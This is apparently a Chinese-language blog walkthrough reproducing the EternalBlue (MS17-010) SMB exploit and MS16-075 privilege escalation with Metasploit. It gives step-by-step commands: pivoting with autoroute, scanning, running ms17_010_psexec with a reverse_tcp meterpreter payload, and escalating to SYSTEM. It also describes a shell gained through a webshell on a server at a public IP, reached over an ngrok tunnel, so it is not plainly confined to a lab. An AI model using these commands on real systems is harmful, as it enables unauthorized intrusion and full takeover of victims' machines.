一、ms17010復現
1、ms17010是什么
Ehernal Blue通過Tcp端口445和139來利用SMBv1和NBT中的遠程代碼執行漏洞,惡意代碼會掃描開放445文件共享端口的Windows機器,無需用戶任何操作,只需要開機上網,攻擊者就能獲取system權限,且在電腦和服務器中植入勒索軟件。
2、復現
①復現環境
kali 攻擊機 ip:192.168.230.143
windows server 2003 ip:192.168.230.147
ngrok 內網穿透 id:170517247807 ip:vipgz2.idcfengye.com port:10013 本地:127.0.0.1:8000
windows server2008 R2 ip:119.60.126.9
②對服務器win2008進行攻擊
當我們通過大馬將shell.exe上傳到服務器,並執行獲得msf連接后。可以通過background命令將其放在后台運行,想要再次進入會話時,輸入命令sessions -i id
因為公網服務器和被攻擊服務器是處於兩個網段,屬於不同的網絡,所以當我們想要訪問被攻擊服務器背后的整個內網時,就要在中間添加路由,搭橋,公網服務器可以將數據傳給被攻擊服務器,從而訪問其后的內網。
這種情況如果被攻擊服務器2和被攻擊服務器之間能通信,那么只用搭建一條路由,如果他們兩個不能通信,那么還得搭建公網服務器和被攻擊服務器2之間的路由才行(內網流量代理/msf添加路由)
現在開始添加路由:
run get_local_subnets 獲取當前路由
run autoroute -s 119.90.126.0 -n 255.255.255.0 添加路由
run autoroute -p 查看當前路由
然后把會話掛到后台后,查找主機是否存在ms17-010漏洞 use scanner/smb/smb_ms17_010
設置掃描主機ip ,可以看到當前服務器並不存在ms17-010
③對虛擬機win2003進行攻擊
橋接模式:虛擬機和本機處於同一個級別,都是路由器分配的ip。
nat模式:虛擬機處於本機的子類。 但是他們還是在一個局域網,只是這個局域網是本機發起的。
步驟:
use scanner/smb/smb_ms17_010掃描主機是否存在ms17-010
set RHOSTS XXX.XXX.XXX.XXX 設置目標機ip
run
use exploit/windows/smb/ms17_010_psexec (2003 xp 2012)
set payload windows/meterpreter/reverse_tcp
set RHOST XXX.XXX.XXX.XXX 目標機ip
set LHOST XXX.XXX.XXX.XXX 攻擊機ip
run
成功拿到system權限
二、ms16-075提權
1、更新kali
由於之前版本太低,msf也不能搜索ms16-075出來,漏洞庫沒有更新,所以升級msf
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall
2、使用msf的ms16-075攻擊模塊
我們把當前的shell放在后台,用search ms16-075找他的攻擊模塊,看到有兩個,隨便選一個
這里選的是第二條,use這個模塊
options一下,看看他怎么用的,看樣子要設置session
查看當前有哪些會話,設置一個會話
exploit開始攻擊,可以看到直接就是system權限了
以上都是在ngrok工作下進行的